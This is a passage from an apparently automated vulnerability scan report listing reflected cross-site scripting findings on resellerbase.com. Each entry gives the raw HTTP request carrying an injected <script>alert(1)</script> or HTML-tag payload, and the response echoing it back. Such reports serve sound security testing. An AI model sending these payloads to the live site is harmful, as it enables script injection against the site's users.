Host:	http://www.resellerbase.com
Path:	/detail/17/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c648b<script>alert(1)</script>295ab32d8f0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/search.phpc648b<script>alert(1)</script>295ab32d8f0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/search.phpc648b<script>alert(1)</script>295ab32d8f0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1467. http://www.resellerbase.com/detail/17/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload b2109<a>9dbf98faf9d was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/search.php?keyword=search...&Submit3=Searchb2109<a>9dbf98faf9d&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/search.php?keyword=search...&Submit3=Searchb2109<a>9dbf98faf9d&opt=2 was not found on this server.</p>
...[SNIP]...

2.1468. http://www.resellerbase.com/detail/17/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 8f688<a>39b4db897f9 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/search.php?keyword=search...8f688<a>39b4db897f9&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/search.php?keyword=search...8f688<a>39b4db897f9&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1469. http://www.resellerbase.com/detail/17/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 390d1<script>alert(1)</script>d441cfa2d0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/search.php?keyword=search...&Submit3=Search&opt=2&390d1<script>alert(1)</script>d441cfa2d0e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/search.php?keyword=search...&Submit3=Search&opt=2&390d1<script>alert(1)</script>d441cfa2d0e=1 was not found on this server.</p>
...[SNIP]...

2.1470. http://www.resellerbase.com/detail/17/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 649b8<a>0f4cab94fbb was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/search.php?keyword=search...&Submit3=Search&opt=2649b8<a>0f4cab94fbb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/search.php?keyword=search...&Submit3=Search&opt=2649b8<a>0f4cab94fbb was not found on this server.</p>
...[SNIP]...

2.1471. http://www.resellerbase.com/detail/18/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 154d9<script>alert(1)</script>386133b5cca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail154d9<script>alert(1)</script>386133b5cca/18/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail154d9<script>alert(1)</script>386133b5cca/18/ was not found on this server.</p>
...[SNIP]...

2.1472. http://www.resellerbase.com/detail/18/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1dd8f<script>alert(1)</script>f613e8e2dda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/181dd8f<script>alert(1)</script>f613e8e2dda/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/181dd8f<script>alert(1)</script>f613e8e2dda/ was not found on this server.</p>
...[SNIP]...

2.1473. http://www.resellerbase.com/detail/18/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 61e51<script>alert(1)</script>deac318f665 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/?61e51<script>alert(1)</script>deac318f665=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/?61e51<script>alert(1)</script>deac318f665=1 was not found on this server.</p>
...[SNIP]...

2.1474. http://www.resellerbase.com/detail/18/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5ec7<script>alert(1)</script>f4ec90e4df5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila5ec7<script>alert(1)</script>f4ec90e4df5/18/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila5ec7<script>alert(1)</script>f4ec90e4df5/18/rating.php was not found on this server.</p>
...[SNIP]...

2.1475. http://www.resellerbase.com/detail/18/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e4c5f<script>alert(1)</script>dc9ef4bdb96377388 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detaile4c5f<script>alert(1)</script>dc9ef4bdb96377388/18/rating.php?id=18&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile4c5f<script>alert(1)</script>dc9ef4bdb96377388/18/rating.php?id=18&rating=5 was not found on this server.</p>
...[SNIP]...

2.1476. http://www.resellerbase.com/detail/18/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b0bff<script>alert(1)</script>42e354bf025 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18b0bff<script>alert(1)</script>42e354bf025/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18b0bff<script>alert(1)</script>42e354bf025/rating.php was not found on this server.</p>
...[SNIP]...

2.1477. http://www.resellerbase.com/detail/18/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d252<script>alert(1)</script>61c89e2af014c9ac9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/183d252<script>alert(1)</script>61c89e2af014c9ac9/rating.php?id=18&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/183d252<script>alert(1)</script>61c89e2af014c9ac9/rating.php?id=18&rating=5 was not found on this server.</p>
...[SNIP]...

2.1478. http://www.resellerbase.com/detail/18/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eda8e<script>alert(1)</script>3b942f08551 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/rating.phpeda8e<script>alert(1)</script>3b942f08551 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/rating.phpeda8e<script>alert(1)</script>3b942f08551 was not found on this server.</p>
...[SNIP]...

2.1479. http://www.resellerbase.com/detail/18/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 80ef9<script>alert(1)</script>bb05147c6c1a19f5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/18/rating.php80ef9<script>alert(1)</script>bb05147c6c1a19f5?id=18&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/rating.php80ef9<script>alert(1)</script>bb05147c6c1a19f5?id=18&rating=5 was not found on this server.</p>
...[SNIP]...

2.1480. http://www.resellerbase.com/detail/18/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b7c8d<script>alert(1)</script>37047e11a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/rating.php?b7c8d<script>alert(1)</script>37047e11a7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/rating.php?b7c8d<script>alert(1)</script>37047e11a7=1 was not found on this server.</p>
...[SNIP]...

2.1481. http://www.resellerbase.com/detail/18/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6defe<script>alert(1)</script>d80f205355cd65d8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/18/rating.php/6defe<script>alert(1)</script>d80f205355cd65d8f?id=18&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/rating.php/6defe<script>alert(1)</script>d80f205355cd65d8f?id=18&rating=5 was not found on this server.</p>
...[SNIP]...

2.1482. http://www.resellerbase.com/detail/18/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f4dcf<script>alert(1)</script>92eaec6c651 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf4dcf<script>alert(1)</script>92eaec6c651/18/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf4dcf<script>alert(1)</script>92eaec6c651/18/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1483. http://www.resellerbase.com/detail/18/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8197c<script>alert(1)</script>04ae92a4b80 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/188197c<script>alert(1)</script>04ae92a4b80/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/188197c<script>alert(1)</script>04ae92a4b80/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1484. http://www.resellerbase.com/detail/18/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dbc2b<script>alert(1)</script>65a591a3eb5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/search.phpdbc2b<script>alert(1)</script>65a591a3eb5?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/search.phpdbc2b<script>alert(1)</script>65a591a3eb5?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1485. http://www.resellerbase.com/detail/18/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
